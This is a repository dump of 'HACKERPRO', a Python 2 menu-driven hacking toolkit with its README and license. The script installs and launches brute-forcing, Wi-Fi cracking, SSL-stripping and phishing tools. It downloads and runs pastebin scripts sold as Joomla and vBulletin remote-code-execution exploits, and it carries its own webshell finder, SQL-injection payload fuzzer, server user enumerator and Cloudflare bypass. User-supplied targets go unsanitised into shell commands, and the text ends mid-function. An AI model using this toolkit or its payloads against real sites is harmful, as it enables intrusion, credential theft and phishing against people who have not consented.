[ { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2018 Technical Dada\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "[![GitHub issues](https://img.shields.io/github/issues/jaykali/hackerpro.svg)](https://github.com/technicaldada/jaykali/issues)\n[![GitHub forks](https://img.shields.io/github/forks/jaykali/hackerpro.svg)](https://github.com/jaykali/hackerpro/network)\n[![GitHub stars](https://img.shields.io/github/stars/jaykali/hackerpro.svg)](https://github.com/jaykali/hackerpro/stargazers)\n\n

***Pentesing Tools That All Hacker Needs***

\n \"hackerpro_logo\" \n\n## HACKERPRO Menu :\n\n- Information Gathering\n- Password Attacks\n- Wireless Testing\n- Exploitation Tools\n- Sniffing & Spoofing\n- Web Hacking\n- Private Web Hacking\n- Post Exploitation\n- Install The HACKERPRO\n\n### Information Gathering:\n\n- Nmap\n- Setoolkit\n- Port Scanning\n- Host To IP\n- wordpress user\n- CMS scanner\n- XSStrike\n- Dork - Google Dorks Passive Vulnerability Auditor\n- Scan A server's Users\n- Crips\n\n### Password Attacks:\n\n- Cupp\n- Ncrack\n\n### Wireless Testing:\n\n- reaver\n- pixiewps\n- Fluxion\n\n### Exploitation Tools:\n\n- ATSCAN\n- sqlmap\n- Shellnoob\n- commix\n- FTP Auto Bypass\n- jboss-autopwn\n\n### Sniffing & Spoofing:\n\n- Setoolkit\n- SSLtrip\n- pyPISHER\n- SMTP Mailer\n\n### Web Hacking:\n\n- Drupal Hacking\n- Inurlbr\n- Wordpress & Joomla Scanner\n- Gravity Form Scanner\n- File Upload Checker\n- Wordpress Exploit Scanner\n- Wordpress Plugins Scanner\n- Shell and Directory Finder\n- Joomla! 1.5 - 3.4.5 remote code execution\n- Vbulletin 5.X remote code execution\n- BruteX - Automatically brute force all services running on a target\n- Arachni - Web Application Security Scanner Framework\n\n### Private Web Hacking:\n\n- Get all websites\n- Get joomla websites\n- Get wordpress websites\n- Control Panel Finder\n- Zip Files Finder\n- Upload File Finder\n- Get server users\n- SQli Scanner\n- Ports Scan (range of ports)\n- ports Scan (common ports)\n- Get server Info\n- Bypass Cloudflare\n\n### Post Exploitation:\n\n- Shell Checker\n- POET\n- Weeman\n\n## Installation in Linux :\n\nOpen Terminal and Type : ```git clone https://github.com/jaykali/hackerpro.git```\n\nAfter Downloading The File Type : ```sudo cd hackerpro && sudo python2 hackerpro.py```\n\nVideo Tutorial : Coming Soon\n\n## Installation in Android :\n\n1st Download [Termux](https://play.google.com/store/apps/details?id=com.termux)\n\n\nThen Open Termux and Type : ```apt update && apt upgrade && apt install git && apt install python2```\n\nAfter That Open Termux and Type : ```git clone https://github.com/jaykali/hackerpro.git```\n\nThen Type : ```cd hackerpro && python2 hackerpro.py```\n\nVideo Tutorial : Coming Soon\n\n## License :\n\n[MIT Licence](https://github.com/jaykali/hackerpro/blob/master/LICENSE)\n\nThats It... If You Like This Repo. Please Share This With Your Friends..\n\n& Don't Forget To Visit Our [Blog For Hackers](https://www.kalilinux.in) !!!\n\n***Thankyou.***\n***Keep Visiting..***\n***Check our blog https://www.kalilinux.in***\n***Enjoy.!!! :)***\nClick Here\n" }, { "path": "hackerpro.py", "content": "#!/usr/bin/env python2.7\n#\n# \n# _ _ _ _____ \n# | | | | | | | __ \\ \n# | |__| | __ _ ___| | _____ _ __ | |__) | __ ___ \n# | __ |/ _` |/ __| |/ / _ \\ '__| | ___/ '__/ _ \\ \n# | | | | (_| | (__| < __/ | | | | | | (_) |\n# |_| |_|\\__,_|\\___|_|\\_\\___|_| |_| |_| \\___/ \n# Hacking Tools by-Technical Dada\n\nimport sys\nimport argparse\nimport os\nimport time\nimport httplib\nimport subprocess\nimport re\nimport urllib2\nimport socket\nimport urllib\nimport sys\nimport json\nimport telnetlib\nimport glob\nimport random\nimport Queue\nimport threading\n#import requests\nimport base64\nfrom getpass import getpass\nfrom commands import *\nfrom sys import argv\nfrom platform import system\nfrom urlparse import urlparse\nfrom xml.dom import minidom\nfrom optparse import OptionParser\nfrom time import sleep\n##########################\nos.system('clear')\n\n\ndef menu():\n print (\"\"\"\nMIT License\n\nCopyright (c) 2018 HACKERPRO\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\"\"\")\n\n\nos.system('clear')\nos.system('clear')\nos.system('clear')\nos.system('clear')\n\ndirectories = ['/uploads/', '/upload/', '/files/', '/resume/', '/resumes/', '/documents/', '/docs/', '/pictures/', '/file/', '/Upload/', '/Uploads/', '/Resume/', '/Resume/', '/UsersFiles/', '/Usersiles/', '/usersFiles/', '/Users_Files/', '/UploadedFiles/',\n '/Uploaded_Files/', '/uploadedfiles/', '/uploadedFiles/', '/hpage/', '/admin/upload/', '/admin/uploads/', '/admin/resume/', '/admin/resumes/', '/admin/pictures/', '/pics/', '/photos/', '/Alumni_Photos/', '/alumni_photos/', '/AlumniPhotos/', '/users/']\nshells = ['wso.php', 'shell.php', 'an.php', 'hacker.php', 'lol.php', 'up.php', 'cp.php', 'upload.php',\n 'sh.php', 'pk.php', 'mad.php', 'x00x.php', 'worm.php', '1337worm.php', 'config.php', 'x.php', 'haha.php']\nupload = []\nyes = set(['yes', 'y', 'ye', 'Y'])\nno = set(['no', 'n'])\n\n\ndef logo():\n print \"\"\"\n - Powered by\n _______ _ _ _ _____ _ \n |__ __| | | (_) | | | __ \\ | | \n | | ___ ___| |__ _ __ _ ___ __ _| | | | | | __ _ __| | __ _ \n | |/ _ \\/ __| '_ \\| '_ \\| |/ __/ _` | | | | | |/ _` |/ _` |/ _` |\n | | __/ (__| | | | | | | | (_| (_| | | | |__| | (_| | (_| | (_| |\n |_|\\___|\\___|_| |_|_| |_|_|\\___\\__,_|_| |_____/ \\__,_|\\__,_|\\__,_|\n\"\"\"\n\n\nHACKERPROlogo = \"\"\"\\033[0m \n _ _ _ _____ \n | | | | | | | __ \\ \n | |__| | __ _ ___| | _____ _ __ | |__) | __ ___ \n | __ |/ _` |/ __| |/ / _ \\ '__| | ___/ '__/ _ \\ \n | | | | (_| | (__| < __/ | | | | | | (_) |\n |_| |_|\\__,_|\\___|_|\\_\\___|_| |_| |_| \\___/ \n \n ~Tools For Hacking by by-Technical Dada\n\n\\033[91m\"\"\"\ndef menu():\n print (HACKERPROlogo + \"\"\"\\033[1m\n [!] This Tool Must Run As ROOT [!] https://github.com/technicaldada/hackerpro\n\\033[0m\n {1}--Information Gathering\n {2}--Password Attacks\n {3}--Wireless Testing\n {4}--Exploitation Tools\n {5}--Sniffing & Spoofing\n {6}--Web Hacking\n {7}--Private Web Hacking\n {8}--Post Exploitation\n {0}--Install The HACKERPRO\n {99}-Exit\n \"\"\")\n choice = raw_input(\"hackerpro~# \")\n os.system('clear')\n if choice == \"1\":\n info()\n elif choice == \"2\":\n passwd()\n elif choice == \"3\":\n wire()\n elif choice == \"4\":\n exp()\n elif choice == \"5\":\n snif()\n elif choice == \"6\":\n webhack()\n elif choice == \"7\":\n dzz()\n elif choice == \"8\":\n postexp()\n elif choice == \"0\":\n updatehackerpro()\n elif choice == \"99\":\n clearScr(), sys.exit()\n elif choice == \"\":\n menu()\n else:\n menu()\n\n\ndef updatehackerpro():\n print (\"This Tool is Only Available for Linux and Similar Systems. \")\n choiceupdate = raw_input(\"Continue Y / N: \")\n if choiceupdate in yes:\n os.system(\"git clone https://github.com/technicaldada/hackerpro.git\")\n os.system(\"cd hackerpro && sudo bash ./update.sh\")\n os.system(\"hackerpro\")\n\n\ndef doork():\n print(\"doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks. \")\n doorkchice = raw_input(\"Continue Y / N: \")\n if doorkchice in yes:\n os.system(\"pip install beautifulsoup4 && pip install requests\")\n os.system(\"git clone https://github.com/AeonDave/doork\")\n clearScr()\n doorkt = raw_input(\"Target : \")\n os.system(\"cd doork && python doork.py -t %s -o log.log\" % doorkt)\n\n\ndef postexp():\n clearScr()\n print(HACKERPROlogo)\n print(\" {1}--Shell Checker\")\n print(\" {2}--POET\")\n print(\" {3}--Phishing Framework \\n\")\n print(\" {99}-Return to main menu \\n\\n \")\n choice11 = raw_input(\"hackerpro~# \")\n os.system('clear')\n if choice11 == \"1\":\n sitechecker()\n if choice11 == \"2\":\n poet()\n if choice11 == \"3\":\n weeman()\n elif choice11 == \"99\":\n menu()\n\n\ndef scanusers():\n site = raw_input('Enter a website : ')\n try:\n users = site\n if 'http://www.' in users:\n users = users.replace('http://www.', '')\n if 'http://' in users:\n users = users.replace('http://', '')\n if '.' in users:\n users = users.replace('.', '')\n if '-' in users:\n users = users.replace('-', '')\n if '/' in users:\n users = users.replace('/', '')\n while len(users) > 2:\n print users\n resp = urllib2.urlopen(\n site + '/cgi-sys/guestbook.cgi?user=%s' % users).read()\n\n if 'invalid username' not in resp.lower():\n print \"\\tFound -> %s\" % users\n pass\n\n users = users[:-1]\n except:\n pass\n\n\ndef brutex():\n clearScr()\n print(\"Automatically brute force all services running on a target : Open ports / DNS domains / Usernames / Passwords \")\n os.system(\"git clone https://github.com/1N3/BruteX.git\")\n clearScr()\n brutexchoice = raw_input(\"Select a Target : \")\n os.system(\"cd BruteX && chmod 777 brutex && ./brutex %s\" % brutexchoice)\n\n\ndef arachni():\n print(\"Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications\")\n cara = raw_input(\"Install And Run ? Y / N : \")\n clearScr()\n print(\"exemple : http://www.target.com/\")\n tara = raw_input(\"Select a target to scan : \")\n if cara in yes: \n os.system(\"git clone git://github.com/Arachni/arachni.git\")\n os.system(\n \"cd arachni && sudo gem install bundler && bundle install --without prof && rake install\")\n os.system(\"archani\")\n clearScr()\n os.system(\"cd arachni/bin && chmod 777 arachni && ./arachni %s\" % tara)\n\n\ndef XSStrike():\n clearScr()\n print(\"XSStrike is a python script designed to detect and exploit XSS vulnerabilites. Follow The Owner On Github @UltimateHackers\")\n os.system(\"sudo rm -rf XSStrike\")\n os.system(\"git clone https://github.com/UltimateHackers/XSStrike.git && cd XSStrike && pip install -r requirements.txt && clear && python xsstrike\")\n\n\ndef crips():\n clearScr()\n os.system(\"git clone https://github.com/Manisso/Crips.git\")\n os.system(\"cd Crips && sudo bash ./update.sh\")\n os.system(\"crips\")\n os.system(\"clear\")\n\n\ndef weeman():\n print(\"HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).\")\n choicewee = raw_input(\"Install Weeman ? Y / N : \")\n if choicewee in yes:\n os.system(\n \"git clone https://github.com/samyoyo/weeman.git && cd weeman && python weeman.py\")\n if choicewee in no:\n menu()\n else:\n menu()\n\n\ndef gabriel():\n print(\"Abusing authentication bypass of Open&Compact (Gabriel's)\")\n os.system(\"wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py\")\n clearScr()\n os.system(\"python gabriel.py\")\n ftpbypass = raw_input(\"Enter Target IP and Use Command :\")\n os.system(\"python gabriel.py %s\" % ftpbypass)\n\n\ndef sitechecker():\n os.system(\"wget http://pastebin.com/raw/Y0cqkjrj --output-document=ch01.py\")\n clearScr()\n os.system(\"python ch01.py\")\n\n\ndef h2ip():\n host = raw_input(\"Select A Host : \")\n ips = socket.gethostbyname(host)\n print(ips)\n\n\ndef ports():\n clearScr()\n target = raw_input('Select a Target IP : ')\n os.system(\"nmap -O -Pn %s\" % target)\n sys.exit()\n\n\ndef ifinurl():\n print\"\"\" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.\"\"\"\n print('Do You Want To Install InurlBR ? ')\n cinurl = raw_input(\"Y/N: \")\n if cinurl in yes:\n inurl()\n if cinurl in no:\n menu()\n elif cinurl == \"\":\n menu()\n else:\n menu()\n\n\ndef bsqlbf():\n clearScr()\n print(\"This tool will only work on blind sql injection\")\n cbsq = raw_input(\"select target : \")\n os.system(\"wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl\")\n os.system(\"perl bsqlbf.pl -url %s\" % cbsq)\n os.system(\"rm bsqlbf.pl\")\n\n\ndef atscan():\n print (\"Do You To Install ATSCAN ?\")\n choiceshell = raw_input(\"Y/N: \")\n if choiceshell in yes:\n os.system(\"sudo rm -rf ATSCAN\")\n os.system(\n \"git clone https://github.com/AlisamTechnology/ATSCAN.git && cd ATSCAN && perl atscan.pl\")\n elif choiceshell in no:\n os.system('clear')\n menu()\n\n\ndef commix():\n print (\"Automated All-in-One OS Command Injection and Exploitation Tool.\")\n print (\"usage : python commix.py --help\")\n choicecmx = raw_input(\"Continue: y/n :\")\n if choicecmx in yes:\n os.system(\"git clone https://github.com/stasinopoulos/commix.git commix\")\n os.system(\"cd commix\")\n os.system(\"python commix.py\")\n os.system(\"\")\n elif choicecmx in no:\n os.system('clear')\n info()\n\n\ndef pixiewps():\n print\"\"\"Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called \"pixie dust attack\" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only\n \"\"\"\n choicewps = raw_input(\"Continue ? Y/N : \")\n if choicewps in yes:\n os.system(\"git clone https://github.com/wiire/pixiewps.git\")\n os.system(\"cd pixiewps & make \")\n os.system(\"sudo make install\")\n if choicewps in no:\n menu()\n elif choicewps == \"\":\n menu()\n else:\n menu()\n\n\ndef webhack():\n print(HACKERPROlogo)\n print(\" {1}--Drupal Hacking \")\n print(\" {2}--Inurlbr\")\n print(\" {3}--Wordpress & Joomla Scanner\")\n print(\" {4}--Gravity Form Scanner\")\n print(\" {5}--File Upload Checker\")\n print(\" {6}--Wordpress Exploit Scanner\")\n print(\" {7}--Wordpress Plugins Scanner\")\n print(\" {8}--Shell and Directory Finder\")\n print(\" {9}--Joomla! 1.5 - 3.4.5 remote code execution\")\n print(\" {10}-Vbulletin 5.X remote code execution\")\n print(\n \" {11}-BruteX - Automatically brute force all services running on a target\")\n print(\" {12}-Arachni - Web Application Security Scanner Framework \\n \")\n print(\" {99}-Back To Main Menu \\n\")\n choiceweb = raw_input(\"hackerpro~# \")\n if choiceweb == \"1\":\n clearScr()\n maine()\n if choiceweb == \"2\":\n clearScr()\n ifinurl()\n if choiceweb == '3':\n clearScr()\n wppjmla()\n if choiceweb == \"4\":\n clearScr()\n gravity()\n if choiceweb == \"5\":\n clearScr()\n sqlscan()\n if choiceweb == \"6\":\n clearScr()\n wpminiscanner()\n if choiceweb == \"7\":\n clearScr()\n wppluginscan()\n if choiceweb == \"8\":\n clearScr()\n shelltarget()\n if choiceweb == \"9\":\n clearScr()\n joomlarce()\n if choiceweb == \"10\":\n clearScr()\n vbulletinrce()\n if choiceweb == \"11\":\n clearScr()\n brutex()\n if choiceweb == \"12\":\n clearScr()\n arachni()\n elif choiceweb == \"99\":\n menu()\n elif choiceweb == \"\":\n menu()\n else:\n menu()\n\n\ndef vbulletinrce():\n os.system(\"wget http://pastebin.com/raw/eRSkgnZk --output-document=tmp.pl\")\n os.system(\"perl tmp.pl\")\n\n\ndef joomlarce():\n os.system(\"wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py\")\n clearScr()\n print(\"if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt\")\n jmtarget = raw_input(\"Select a targets list :\")\n os.system(\"python temp.py %s\" % jmtarget)\n\n\ndef inurl():\n dork = raw_input(\"select a Dork:\")\n output = raw_input(\"select a file to save :\")\n os.system(\n \"./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1\".format(dork, output))\n if cinurl in no:\n insinurl()\n elif cinurl == \"\":\n menu()\n else:\n menu()\n\n\ndef insinurl():\n os.system(\"git clone https://github.com/googleinurl/SCANNER-INURLBR.git\")\n os.system(\"chmod +x SCANNER-INURLBR/inurlbr.php\")\n os.system(\"apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl\")\n os.system(\"mv /SCANNER-INURLBR/inurbr.php inurlbr.php\")\n clearScr()\n inurl()\n\n\ndef nmap():\n\n choice7 = raw_input(\"continue ? Y / N : \")\n if choice7 in yes:\n os.system(\"git clone https://github.com/nmap/nmap.git\")\n os.system(\"cd nmap && ./configure && make && make install\")\n elif choice7 in no:\n info()\n elif choice7 == \"\":\n menu()\n else:\n menu()\n\n\ndef jboss():\n os.system('clear')\n print (\"This JBoss script deploys a JSP shell on the target JBoss AS server. Once\")\n print (\"deployed, the script uses its upload and command execution capability to\")\n print (\"provide an interactive session.\")\n print (\"\")\n print (\"usage : ./e.sh target_ip tcp_port \")\n print(\"Continue: y/n\")\n choice9 = raw_input(\"yes / no :\")\n if choice9 in yes:\n os.system(\n \"git clone https://github.com/SpiderLabs/jboss-autopwn.git\"), sys.exit()\n elif choice9 in no:\n os.system('clear')\n exp()\n elif choice9 == \"\":\n menu()\n else:\n menu()\n\n\ndef wppluginscan():\n Notfound = [404, 401, 400, 403, 406, 301]\n sitesfile = raw_input(\"sites file : \")\n filepath = raw_input(\"Plugins File : \")\n\n def scan(site, dir):\n global resp\n try:\n conn = httplib.HTTPConnection(site)\n conn.request('HEAD', \"/wp-content/plugins/\" + dir)\n resp = conn.getresponse().status\n except(), message:\n print \"Cant Connect :\", message\n pass\n\n def timer():\n now = time.localtime(time.time())\n return time.asctime(now)\n\n def main():\n sites = open(sitesfile).readlines()\n plugins = open(filepath).readlines()\n for site in sites:\n site = site.rstrip()\n for plugin in plugins:\n plugin = plugin.rstrip()\n scan(site, plugin)\n if resp not in Notfound:\n print \"+----------------------------------------+\"\n print \"| current site :\" + site\n print \"| Found Plugin : \" + plugin\n print \"| Result:\", resp\n\n\ndef sqlmap():\n print (\"usage : python sqlmap.py -h\")\n choice8 = raw_input(\"Continue: y/n :\")\n if choice8 in yes:\n os.system(\n \"git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & \")\n elif choice8 in no:\n os.system('clear')\n info()\n elif choice8 == \"\":\n menu()\n else:\n menu()\n\n\ndef grabuploadedlink(url):\n try:\n for dir in directories:\n currentcode = urllib.urlopen(url + dir).getcode()\n if currentcode == 200 or currentcode == 403:\n print \"-------------------------\"\n print \" [ + ] Found Directory : \" + str(url + dir) + \" [ + ]\"\n print \"-------------------------\"\n upload.append(url + dir)\n except:\n pass\n\n\ndef grabshell(url):\n try:\n for upl in upload:\n for shell in shells:\n currentcode = urllib.urlopen(upl + shell).getcode()\n if currentcode == 200:\n print \"-------------------------\"\n print \" [ ! ] Found Shell : \" + str(upl + shell) + \" [ ! ]\"\n print \"-------------------------\"\n except:\n pass\n\n\ndef shelltarget():\n print(\"exemple : http://target.com\")\n line = raw_input(\"target : \")\n line = line.rstrip()\n grabuploadedlink(line)\n grabshell(line)\n\n\ndef poet():\n print(\"POET is a simple POst-Exploitation Tool.\")\n print(\"\")\n choicepoet = raw_input(\"y / n :\")\n if choicepoet in yes:\n os.system(\"git clone https://github.com/mossberg/poet.git\")\n os.system(\"python poet/server.py\")\n if choicepoet in no:\n clearScr()\n postexp()\n elif choicepoet == \"\":\n menu()\n else:\n menu()\n\n\ndef setoolkit():\n print (\"The Social-Engineer Toolkit is an open-source penetration testing framework\")\n print(\") designed for social engineering. SET has a number of custom attack vectors that \")\n print(\" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC \")\n print(\"an information security consulting firm located in Cleveland, Ohio.\")\n print(\"\")\n\n choiceset = raw_input(\"y / n :\")\n if choiceset in yes:\n os.system(\n \"git clone https://github.com/trustedsec/social-engineer-toolkit.git\")\n os.system(\"python social-engineer-toolkit/setup.py\")\n if choiceset in no:\n clearScr()\n info()\n elif choiceset == \"\":\n menu()\n else:\n menu()\n\n\ndef cupp():\n print(\"cupp is a password list generator \")\n print(\"Usage: python cupp.py -h\")\n choicecupp = raw_input(\"Continue: y/n : \")\n\n if choicecupp in yes:\n os.system(\"git clone https://github.com/Mebus/cupp.git\")\n print(\"file downloaded successfully\")\n elif choicecupp in no:\n clearScr()\n passwd()\n elif choicecupp == \"\":\n menu()\n else:\n menu()\n\n\ndef ncrack():\n print(\"A Ruby interface to Ncrack, Network authentication cracking tool.\")\n print(\"requires : nmap >= 0.3ALPHA / rprogram ~> 0.3\")\n print(\"Continue: y/n\")\n choicencrack = raw_input(\"y / n :\")\n if choicencrack in yes:\n os.system(\"git clone https://github.com/sophsec/ruby-ncrack.git\")\n os.system(\"cd ruby-ncrack\")\n os.system(\"install ruby-ncrack\")\n elif choicencrack in no:\n clearScr()\n passwd()\n elif choicencrack == \"\":\n menu()\n else:\n menu()\n\n\ndef reaver():\n print \"\"\"\n Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup\n WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a\n wide variety of access points and WPS implementations\n 1 to accept / 0 to decline\n \"\"\"\n creaver = raw_input(\"y / n :\")\n if creaver in yes:\n os.system(\n \"apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps\")\n os.system(\"git clone https://github.com/t6x/reaver-wps-fork-t6x.git\")\n os.system(\"cd reaver-wps-fork-t6x/src/ & ./configure\")\n os.system(\"cd reaver-wps-fork-t6x/src/ & make\")\n elif creaver in no:\n clearScr()\n wire()\n elif creaver == \"\":\n menu()\n else:\n menu()\n\n\ndef ssls():\n print\"\"\"sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping\n attacks.\n It requires Python 2.5 or newer, along with the 'twisted' python module.\"\"\"\n cssl = raw_input(\"y / n :\")\n if cssl in yes:\n os.system(\"git clone https://github.com/moxie0/sslstrip.git\")\n os.system(\"sudo apt-get install python-twisted-web\")\n os.system(\"python sslstrip/setup.py\")\n if cssl in no:\n snif()\n elif cssl == \"\":\n menu()\n else:\n menu()\n\n\ndef unique(seq):\n seen = set()\n return [seen.add(x) or x for x in seq if x not in seen]\n\n\ndef bing_all_grabber(s):\n\n lista = []\n page = 1\n while page <= 101:\n try:\n bing = \"http://www.bing.com/search?q=ip%3A\" + \\\n s + \"+&count=50&first=\" + str(page)\n openbing = urllib2.urlopen(bing)\n readbing = openbing.read()\n findwebs = re.findall('

')\n self.portScanner(1, ran)\n elif choice == '10':\n self.portScanner(2, None)\n elif choice == '11':\n self.getServerBanner()\n elif choice == '12':\n self.cloudflareBypasser()\n elif choice == '99':\n menu()\n con = raw_input(' Continue [Y/n] -> ')\n if con[0].upper() == 'N':\n exit()\n else:\n clearScr()\n print menuu\n\n def getSites(self, a):\n \"\"\"\n get all websites on same server\n from bing search\n \"\"\"\n lista = []\n page = 1\n while page <= 101:\n try:\n bing = \"http://www.bing.com/search?q=ip%3A\" + \\\n self.serverip + \"+&count=50&first=\" + str(page)\n openbing = urllib2.urlopen(bing)\n readbing = openbing.read()\n findwebs = re.findall('

\", site + admin\n except IOError:\n pass\n ############################\n # find ZIP files\n\n def findZip(self):\n \"\"\"\n find zip files from grabbed websites\n it may contain useful informations\n \"\"\"\n zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar',\n 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']\n clearScr()\n print \"[~] Finding zip file\"\n for site in self.sites:\n for zip1 in zipList:\n try:\n if urllib.urlopen(site + zip1).getcode() == 200:\n print \" [*] Found zip file -> \", site + zip1\n except IOError:\n pass\n\n def findUp(self):\n \"\"\"\n find upload forms from grabbed\n websites the attacker may succeed to\n upload malicious files like webshells\n \"\"\"\n upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php',\n 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']\n clearScr()\n print \"[~] Finding Upload\"\n for site in self.sites:\n for up in upList:\n try:\n if (urllib.urlopen(site + up).getcode() == 200):\n html = urllib.urlopen(site + up).readlines()\n for line in html:\n if re.findall('type=file', line):\n print \" [*] Found upload -> \", site + up\n except IOError:\n pass\n\n def getUsers(self):\n \"\"\"\n get server users using a method found by\n iranian hackers , the attacker may\n do a bruteforce attack on CPanel, ssh, ftp or\n even mysql if it supports remote login\n (you can use medusa or hydra)\n \"\"\"\n clearScr()\n print \"[~] Grabbing Users\"\n userslist = []\n for site1 in self.sites:\n try:\n site = site1\n site = site.replace('http://www.', '')\n site = site.replace('http://', '')\n site = site.replace('.', '')\n if '-' in site:\n site = site.replace('-', '')\n site = site.replace('/', '')\n while len(site) > 2:\n resp = urllib2.urlopen(\n site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()\n if 'invalid username' not in resp.lower():\n print '\\t [*] Found -> ', site\n userslist.append(site)\n break\n else:\n print site\n\n site = site[:-1]\n except:\n pass\n\n clearScr()\n for user in userslist:\n print user\n\n def cloudflareBypasser(self):\n \"\"\"\n trys to bypass cloudflare i already wrote\n in my blog how it works, i learned this\n method from a guy in madleets\n \"\"\"\n clearScr()\n print \"[~] Bypassing cloudflare\"\n subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']\n for site in self.sites:\n site.replace('http://', '')\n site.replace('/', '')\n try:\n ip = socket.gethostbyname(site)\n except socket.error:\n pass\n for sub in subdoms:\n doo = sub + '.' + site\n print ' [~] Trying -> ', doo\n try:\n ddd = socket.gethostbyname(doo)\n if ddd != ip:\n print ' [*] Cloudflare bypassed -> ', ddd\n break\n except socket.error:\n pass\n\n def getServerBanner(self):\n \"\"\"\n simply gets the server banner\n the attacker may benefit from it\n like getting the server side software\n \"\"\"\n clearScr()\n try:\n s = 'http://' + self.serverip\n httpresponse = urllib.urlopen(s)\n print ' [*] Server header -> ', httpresponse.headers.getheader('server')\n except:\n pass\n\n def grabSqli(self):\n \"\"\"\n just grabs all websites in server with php?id= dork\n for scanning for error based sql injection\n \"\"\"\n page = 1\n lista = []\n while page <= 101:\n try:\n bing = \"http://www.bing.com/search?q=ip%3A\" + \\\n self.serverip + \"+php?id=&count=50&first=\" + str(page)\n openbing = urllib2.urlopen(bing)\n readbing = openbing.read()\n findwebs = re.findall('

<\",\n \"3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27\"]\n check = re.compile(\n \"Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error\", re.I)\n for url in s:\n try:\n for param in url.split('?')[1].split('&'):\n for payload in payloads:\n power = url.replace(param, param + payload.strip())\n\n html = urllib2.urlopen(power).readlines()\n for line in html:\n checker = re.findall(check, line)\n if len(checker) != 0:\n print ' [*] SQLi found -> ', power\n except:\n pass\n\n\ndef portScanner(self, mode, ran):\n \"\"\"\n simple port scanner works with range of ports\n or with common ports (al-swisre idea)\n \"\"\"\n clearScr()\n print \"[~] Scanning Ports\"\n\n def do_it(ip, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n sock = sock.connect_ex((ip, port))\n if sock == 0:\n print \" [*] Port %i is open\" % port\n\n if mode == 1:\n a = ran.split('-')\n start = int(a[0])\n end = int(a[1])\n for i in range(start, end):\n do_it(self.serverip, i)\n elif mode == 2:\n for port in [80, 21, 22, 2082, 25, 53, 110, 443, 143]:\n\n do_it(self.serverip, port)\n\n\n############################\nminu = '''\n\\t 1: Drupal Bing Exploiter\n\\t 2: Get Drupal Websites\n\\t 3: Drupal Mass Exploiter\n\\t 99: Back To Main Menu\n'''\n\n\ndef drupal():\n '''Drupal Exploit Binger All Websites Of server '''\n ip = raw_input('1- 